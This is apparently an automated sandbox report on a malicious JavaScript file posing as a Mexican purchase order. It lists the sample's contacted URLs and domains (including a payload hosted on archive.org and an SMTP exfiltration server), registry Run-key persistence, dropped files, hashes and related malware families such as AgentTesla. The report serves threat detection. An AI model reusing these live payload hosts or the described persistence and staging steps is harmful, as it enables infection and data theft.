http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
https://ia601606.us.arXB	0%	Avira URL Cloud	safe
https://oneget.org	0%	URL Reputation	safe
https://epanpano.com	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg	100%	Avira URL Cloud	malware
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://smtp.zoho.eu	0%	Avira URL Cloud	safe
http://status.thawte.com0:	0%	Avira URL Cloud	safe
http://epanpano.com	0%	Avira URL Cloud	safe
https://epanpano.com/log/ORGN.txt	0%	Avira URL Cloud	safe
http://ia601606.us.archive.org	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
smtp.zoho.eu	185.230.212.164	true	true	unknown
ia601606.us.archive.org	207.241.227.86	true	true	unknown
ip-api.com	208.95.112.1	true	true	unknown
epanpano.com	78.142.208.13	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg	true	Avira URL Cloud: malware	unknown
https://epanpano.com/log/ORGN.txt	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601606.us.arXB	powershell.exe, 00000003.00000002.1751049132.000001CB86B63000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://epanpano.com	powershell.exe, 00000003.00000002.1751049132.000001CB85901000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	powershell.exe, 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000003.00000002.1751049132.000001CB864C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000001.00000002.1811360347.0000023500044000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia601606.us.archive.org/10/items/deathnote	powershell.exe, 00000001.00000002.1811360347.00000235007DA000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1751049132.000001CB86DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://smtp.zoho.eu	InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://status.thawte.com0:	InstallUtil.exe, 00000006.00000002.2957486773.00000000061C0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2957486773.0000000006236000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.000000000301C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2945512727.0000000001371000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB86F2A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	InstallUtil.exe, 00000006.00000002.2946845698.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://epanpano.com	powershell.exe, 00000003.00000002.1751049132.000001CB85A84000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1811360347.000002350008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85531000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1811360347.00000235000BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85531000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ia601606.us.archive.org	powershell.exe, 00000003.00000002.1751049132.000001CB86B69000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000003.00000002.1751049132.000001CB86BB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia601606.us.archive.org	powershell.exe, 00000003.00000002.1751049132.000001CB86B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751049132.000001CB85754000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.241.227.86	ia601606.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
185.230.212.164	smtp.zoho.eu	Netherlands	41913	COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	true
78.142.208.13	epanpano.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501653
Start date and time:	2024-08-30 09:27:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winJS@11/5@4/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 79 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Simulations

Behavior and APIs

Time	Type	Description
03:27:56	API Interceptor	42x Sleep call for process: powershell.exe modified
03:28:03	API Interceptor	56x Sleep call for process: InstallUtil.exe modified
08:28:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alarvice.js
08:28:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alarvice.js

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
207.241.227.86	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	INQUIRY#46789-AUG24.js	Get hash	malicious	AgentTesla	Browse
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse
	INQUIRY#46789-AUG24.js	Get hash	malicious	Remcos	Browse
	Comprovante_Swift.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Shipping Documents.js	Get hash	malicious	Remcos	Browse
	shipping documents.js	Get hash	malicious	Unknown	Browse
	27256APPROVEDACHpmt187023OI2783764.js	Get hash	malicious	Unknown	Browse
208.95.112.1	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	ip-api.com/json/
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	ip-api.com/json/
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	XClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
smtp.zoho.eu	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.212.164
	Orden#46789_2024_Optoflux_mexico_sderlss.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTY.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTYP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	okPY77wv6E.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe	Get hash	malicious	GuLoader	Browse	185.230.214.164
ia601606.us.archive.org	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	207.241.227.86
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse	207.241.227.86
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	207.241.227.86
	INQUIRY#46789-AUG24.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	INQUIRY#46789-AUG24.js	Get hash	malicious	Remcos	Browse	207.241.227.86
	Comprovante_Swift.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	Shipping Documents.js	Get hash	malicious	Remcos	Browse	207.241.227.86
	shipping documents.js	Get hash	malicious	Unknown	Browse	207.241.227.86
	27256APPROVEDACHpmt187023OI2783764.js	Get hash	malicious	Unknown	Browse	207.241.227.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNET-ARCHIVEUS	RFQ_0030829024SEPT.xla.xlsx	Get hash	malicious	Remcos	Browse	207.241.232.154
	RFQ -PO-SMT290824.xls	Get hash	malicious	Remcos	Browse	207.241.232.154
	SI_56127.vbs	Get hash	malicious	Remcos	Browse	207.241.232.154
	CAN_POST2617276.vbs	Get hash	malicious	Remcos	Browse	207.241.232.154
	CAN_POST7865678.vbs	Get hash	malicious	AsyncRAT	Browse	207.241.232.154
	Sepco RFQ.xls	Get hash	malicious	Remcos	Browse	207.241.232.154
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf	Get hash	malicious	Remcos	Browse	207.241.232.154
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	207.241.227.86
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtf	Get hash	malicious	Remcos	Browse	207.241.232.154
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse	207.241.227.86
COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	bat.bat	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer, XWorm, zgRAT	Browse	185.230.212.169
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzM	Get hash	malicious	Unknown	Browse	89.36.170.147
	http://workdrive.zohoexternal.com	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9b	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://diverescueintl.com/	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
	3533cdbe-ace4-ee24-ff8f-a6fbfe7cf297.eml	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
	https://news.sky.com.orientcomputer-eg.com/ck1/13ef.6f604c137186924e/54afeda0-5892-11ef-9169-52540048feb1/4a9c32796a4b334297d499ea9c8416521e40b10f/2?e=aIojADma7UHO6n8luDK%2B95xpBNzB5MYBKYeLZ8ZyOu7Aa%2B6p9nC2pijHnhlTxVAZYdVpf6NA96PWWwLveY4KCWpHNDDXbTiOTMiFzovH6LYW6dQ7e4qpdVuaSUp1wm%2By%2FblAF1x6nrjyRRXVcXQOIfo7%2BYq07nWhOzN%2FpZd%2FKYo7PgcoYOZcAKUuxCBOV5egyrKv2HeOtQXceIDZKjV7YQ%3D%3D	Get hash	malicious	Unknown	Browse	185.230.212.59
TUT-ASUS	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	vwAGeX1bR4.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	uV7ttrc7wN.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	064c59b3a8b03e6c733f88483fd675d99bc805399c55d4a1a7b613aa20d08de8_dump.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	43q1wNs9CA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	XSy5QvnuYn.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	YK85paB4RW.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	E6YUQ1pon1.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	D0XKEnHabJ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242
	Ltoj8zXMGf.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	185.149.100.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	DHL STATEMENT OF ACCOUNT - 30082024.exe	Get hash	malicious	GuLoader	Browse	78.142.208.13 207.241.227.86
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	78.142.208.13 207.241.227.86
	DHL Page1.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	78.142.208.13 207.241.227.86
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	78.142.208.13 207.241.227.86
	SI_56127.vbs	Get hash	malicious	Remcos	Browse	78.142.208.13 207.241.227.86
	CAN_POST2617276.vbs	Get hash	malicious	Remcos	Browse	78.142.208.13 207.241.227.86
	CAN_POST7865678.vbs	Get hash	malicious	AsyncRAT	Browse	78.142.208.13 207.241.227.86
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	78.142.208.13 207.241.227.86
	i3F8zuP3u9.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	78.142.208.13 207.241.227.86
	http://interface-git-main-uniswap.vercel.app/	Get hash	malicious	Unknown	Browse	78.142.208.13 207.241.227.86

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nllluln52llp:NllUol
MD5:	DD1511ADD69A2BBFD772EE49C6828FBD
SHA1:	D446C5D5B1209CCE7FA673473F913DB360F5931A
SHA-256:	C687FDA1A7A70346FE15F2420682B39C0185696575E46E9785C150FC06D3A629
SHA-512:	46A7C2240420741311A83BE91CC32B224ABA2100DA18302F8347D5CA4DAB58B7B5CE81591D0BBCCB63C38004D49249850E35A7F8F72232072F0126EB9891FEE4
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1wqamkt.kjh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm5vlvn3.2rn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tp0er5yo.oen.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vngjswvz.hmq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (411), with CRLF line terminators
Entropy (8bit):	3.6986552797593166
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js
File size:	1'285'794 bytes
MD5:	4885ff24f6e08d06d817f1d5a465d277
SHA1:	94f27f7dda23c40a4fb7734c72e982db3bce6d4e
SHA256:	cb9005fe5424e490dc8561b51e9d0b9c591174f2f08e72cba8d552934c0feabe
SHA512:	c523fe89689e8700cd8765bf7913a282512cfd706a631858f0fb302ae7d7e7dcf3c5306ab077bf69a60e70778b0b9809a5f6cfa711fb6f103e447a77320f79ae
SSDEEP:	24576:fpIcw1R3YrA3DH7OVoKH33YeM1DVZk3zGn:+TTr3DHIoKH3ye3zGn
TLSH:	6655C41135EBB05CF1F32FA35BED61E99FABB5622A16542E7004030B4A62ED1CF51B72
